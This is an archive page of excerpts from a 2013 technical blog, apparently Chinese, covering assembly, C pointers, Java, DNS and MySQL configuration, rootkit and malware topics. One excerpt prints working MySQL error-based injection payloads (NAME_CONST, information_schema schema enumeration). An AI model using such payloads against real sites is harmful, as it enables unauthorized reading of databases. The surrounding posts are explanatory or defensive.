06 2013 档案

從nasm assembly看函數參數傳遞
摘要:在淘宝定了> 后天才能到货。从网上下了>的电子书看看。找找C++的感觉先。先看看基本类型的传值方式:写了3个方法。反编译看看。void fun1(int a){ a ++;}void fun2(int &a){ a++;}void fun3(int *a){ (*a)++;}fun1的汇编代码:push ebpmov ebp, espmov eax, dword ptr ss:[ebp+8]add eax, 1mov dword ptr ss:[ebp+8], eaxpop ebpretnfun2的汇编代码:push ebpmov ebp, espmov eax, dwor 阅读全文
posted @ 2013-06-23 22:58 jeremyatchina 阅读(358) 评论(0) 推荐(0)
MOV EAX,DWORD PTR SS:[EBP+8]
摘要:nasm来写可以写成mov eax,dword ptr [ebp + 8]理由:ebp和esp默认是ss段,所以根本不用显式说明。 eax,ebx,ecx,edx,edi,esi默认是ds段, eip默认是cs段。补充:上面给的是masm用法nasm是mov eax,dword [ebp + 8]我自己用的nasm,经常说nasm语法说习惯了。 阅读全文
posted @ 2013-06-23 22:52 jeremyatchina 阅读(1771) 评论(0) 推荐(0)
rookit入門
摘要:来源:rootkit_com作者:Clandestiny翻译:fqh“Help!我是一名新手!我需要一款rootkit入侵朋友的机器…我想编写自己的rootkit…我想开始开发代码…该从哪里入手?”此类问题在rootkit.com上不断地出现,并且重复回答一些人问的相同问题浪费了大量时间,我想到我们应当编辑一个短小的文档来对它们进行一般性的叙述。下面的论述远非完整的,社区中有经验的人可以提建议来对它进行拓展。你想知道从哪里入门?好的,首先,如果你来到这里是为了寻找入侵你朋友机器的既成方法,你可来错了地方!Rootkit.com主要是一个知识性的网站,它目的是提供一些有关rootkit开发的资料 阅读全文
posted @ 2013-06-22 00:40 jeremyatchina 阅读(501) 评论(0) 推荐(0)
connect failed: 127.0.0.1#953: connection refused
摘要:Problem1 : root@jeremy-VirtualBox:/etc/bind# /etc/init.d/bind9 restart * Stopping domain name service... bind9 rndc: connect failed: 127.0.0.1#953: connection refused [ OK ] * Starting doma... 阅读全文
posted @ 2013-06-21 17:51 jeremyatchina 阅读(2706) 评论(0) 推荐(0)
[閒聊] 寫程式使用的字體
摘要:原文 http://x.co/nLdk新細明體就是「調和字(P)」, 細明體則是「定寬字」, 在編排文件時建議用調和字型,讓文件看起更美觀。 而我們在寫程式的時候最適合選用的是定寬字,著重在於字元之間清晰、整齊。 通常一套好的「程式用定寬字(Monospace Font for Programmers)」必須具有以下特點 * 字體清晰 * 字集完整 * 適當間距 * l(小寫 L )、I(大寫 i ) 以及 1(數字) 容易分辨 * 0(數字)、o(英文字母)以及 O(英文字母)容易分辨 * 英文引號 ` 以及 ‘ 必須容易分辨,最好是可以左右對稱 * 標點符號清楚,特別是 < > 阅读全文
posted @ 2013-06-16 02:51 jeremyatchina 阅读(199) 评论(0) 推荐(0)
防USB病毒
摘要:Windows XP 需要用此步驟。Windows 7 就不需要了。步驟1. 於「開始/執行」中執行 regedit,進入登錄編輯程式。2. 找到機碼名稱: HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentVersion\Explorer\MountPoints23. 點選該機碼,按右鍵選擇「使用權限」4. 新增使用者 Everyone5.設定使用者 Everyone的完全控制權限為「拒絕」,選取套用/確定後離開 阅读全文
posted @ 2013-06-16 00:16 jeremyatchina 阅读(246) 评论(0) 推荐(0)
[轉]小知識:什麼是Rootkit?
摘要:note: Rootkit in Windows進展 : SSDT Hook &Shadow SSDT Hook | Inline Hook (IDT Hook) | FSD Hook | FSD Inline Hook ... 阅读全文
posted @ 2013-06-15 23:28 jeremyatchina 阅读(811) 评论(0) 推荐(0)
”十六“进制查看器
摘要:hexdumphexdump命令一般用来查看”二进制“文件的十六进制编码,但实际上它的用途不止如此,手册页上的说法是“ascii, decimal, hexadecimal, octal dump“,而且它能查看任何文件,而不只限于二进制文件了。规范的十六进制和ASCII码显示(Canonical hex+ASCII display)root@new55 ~]# echo /etc/passwd | hexdump -C00000000 2f 65 74 63 2f 70 61 73 73 77 64 0a |/etc/passwd.|0000000c单字节八进制... 阅读全文
posted @ 2013-06-14 14:48 jeremyatchina 阅读(536) 评论(0) 推荐(0)
指標和函數
摘要:複雜宣告的讀法文法,最令我印象深刻的,莫過於印度工程師Vikram的"The right-left rule"。他是這麼說的:「從最內層的括號讀起,變數名稱,然後往右,遇到括號就往左。當括號內的東西都解讀完畢了,就跳出括號繼續未完成的部份,重覆上面的步驟直到解讀完畢。」舉個例子:void ** (*d) (int &, char*)依下面方式解讀:1. 最內層括號的讀起,變數名稱: d2. 往右直到碰到) : (空白)3. 往左直到碰到( :是一個函數指標4. 跳出括號,往右,碰到(int &, char*): 此函式接受兩個參數:第一個參數是referen 阅读全文
posted @ 2013-06-12 06:13 jeremyatchina 阅读(298) 评论(0) 推荐(0)
Null Byte Injection
摘要:Project:WASC Threat ClassificationThreat Type:AttackReference ID: WASC-28Null Byte InjectionNull Byte Injection is an active exploitation technique used to bypass sanity checking filters in web infrastructure by adding URL-encoded null byte characters (i.e. %00, or 0x00 in hex) to the user-supplied 阅读全文
posted @ 2013-06-11 12:30 jeremyatchina 阅读(454) 评论(0) 推荐(0)
MYSQL高版本报错注入技巧-利用NAME_CONST注入
摘要:1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,schema_name,0×27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from 阅读全文
posted @ 2013-06-09 16:53 jeremyatchina 阅读(2450) 评论(0) 推荐(0)
Malware Sample Sources for Researchers
摘要:Malware Sample Sources for ResearchersMalware researchers have the need to collect malware samples to research threat techniques and develop defenses. Researchers cancollect such samples using honeypots. They can also download samples fromknown malicious URLs. They can also obtain malware samples fr 阅读全文
posted @ 2013-06-08 21:55 jeremyatchina 阅读(308) 评论(0) 推荐(0)
解決svchost.exe 100%的問題 (真的中毒了)
摘要:看了Executing DLLs as a Windows Service這篇文章後終於知道是怎麼一回事了,於是把相關的register value 砍掉,用sc delete "Server_name"砍掉Windows Service。再找出對應的random.dll找出他修改日期。再搜出相關檔案一併移除。https://code.google.com/p/malwarecookbook/source/browse/trunk/13/7/install_svc.pyRecipe 13-7:Executing DLLs as a Windows ServiceYou ca 阅读全文
posted @ 2013-06-04 20:45 jeremyatchina 阅读(1533) 评论(0) 推荐(0)
How to Repair the Windows/System32/Config/System File Is Missing or Corrupt Message
摘要:Recover System AccessInsert your Windows startup CD into your CD-ROM drive and reboot your computer. Having a CD loaded during boot up may trigger a series of prompts. Select any option in the prompt consistent with instructing your computer to start from the CD-ROM drive.Press "R" on your 阅读全文
posted @ 2013-06-04 20:35 jeremyatchina 阅读(410) 评论(0) 推荐(0)
note in Java
摘要:1.final final double PI = 3.14; PI=3 會出錯,類似C language 的const2.break , continue in loop break:直接跳出迴圈 continue:只略過下一個statement3.class Clothes c1 = new Clothes(); Clothes is a class c1 is a object by defineClothes import java.util.Scanner; <--使用一個標準類別4.Java 分 為兩種型態: 基本型態(想成C原有的)、類別型態 其中類別型態定義出 obje. 阅读全文
posted @ 2013-06-02 19:52 jeremyatchina 阅读(156) 评论(0) 推荐(0)
How to Allow MySQL Client to Connect to Remote MySQL server
摘要:y default, MySQL does not allow remote clients to connect to the MySQL database.If you try to connect to a remote MySQL database from your client system, you will get “ERROR 1130: Host is not allowed to connect to this MySQL server” message as shown below.$ mysql -h 192.168.1.8 -u root -pEnter passw 阅读全文
posted @ 2013-06-02 17:09 jeremyatchina 阅读(477) 评论(0) 推荐(0)